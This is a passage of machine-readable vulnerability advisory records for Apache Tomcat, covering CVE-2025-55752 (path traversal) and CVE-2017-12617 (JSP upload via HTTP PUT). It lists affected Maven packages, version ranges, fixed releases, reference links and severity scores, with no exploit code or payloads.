Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, 
{ "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M11" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", 
"8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", 
"10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M11" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": 
[ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", 
"10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M11" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { 
"source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55752" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/130d36d8492ef9e4eb22952c17c92423cb35fd06" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b5042622b8b78340ae65403c55dcb9c7416924df" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fec06c610ed7466b401e29cc567a58aee5ed826a" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.45" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.11" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.109" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/10/27/4" } ], "database_specific": { "cwe_ids": 
[ "CWE-23" ], "github_reviewed": true, "github_reviewed_at": "2025-10-28T17:55:41Z", "nvd_published_at": "2025-10-27T18:15:42Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xjgh-84hx-56c5", "published": "2022-05-14T01:07:15Z", "modified": "2025-10-22T19:25:42.954468Z", "aliases": [ "CVE-2017-12617" ], "summary": "Unrestricted Upload of File with Dangerous Type Apache Tomcat", "details": "When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.1" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0M27", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.23" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", 
"8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.22", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0-RC1" }, { "fixed": "8.0.47" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.5", "8.0.8", "8.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.0.46", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.82" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", 
"7.0.8", "7.0.81" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.81", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.1" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0M27", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.23" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.22", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0-RC1" }, { "fixed": "8.0.47" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", 
"8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.5", "8.0.8", "8.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.0.46", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.82" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.81", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-xjgh-84hx-56c5/GHSA-xjgh-84hx-56c5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12617" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/a9dd96046d7acb0357c6b7b9e6cc70d186fae663" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/74ad0e216c791454a318c1811300469eedc5c6f3" }, { "type": "WEB", "url": 
"https://github.com/apache/tomcat/commit/512a3c3aecdb52de092c6bacddd71b85c4feda06" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/506d862e7edfa991de198e0f2e4c4540830fa531" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4cf7dab88282c8f3c92f0b961cdb0096e1d63e88" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/46dfedbc0523d7182be97f4244d7b6c942164485" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/327e8a6644e188764325a013aa2725a60f1b37e5" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/31e99502e2c602449a2f8835bd23ade772b77333" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/24aea94807f940ee44aa550378dc903289039ddd" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b577f9a7996b92b650b1649af3c3bae11c120db9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b7e0435d17aba69f16ae9e8a78ad0f1565b552af" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/bbcbb749c75056a2781f37038d63e646fe972104" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c177e9668d1278710bdb14c0eb8d2702b3655f5a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cf0b37beb0622abdf24acc7110daf883f3fe4f95" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d5b170705d24c386d76038e5989045c89795c28c" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/e650cf1b83e441dbd3863f3f6b61c972cafce19e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f1b85da754c4760787d68a99e839b50878140b57" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fd52f8601170b91f9d7162510e54563e5bf6bdfe" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 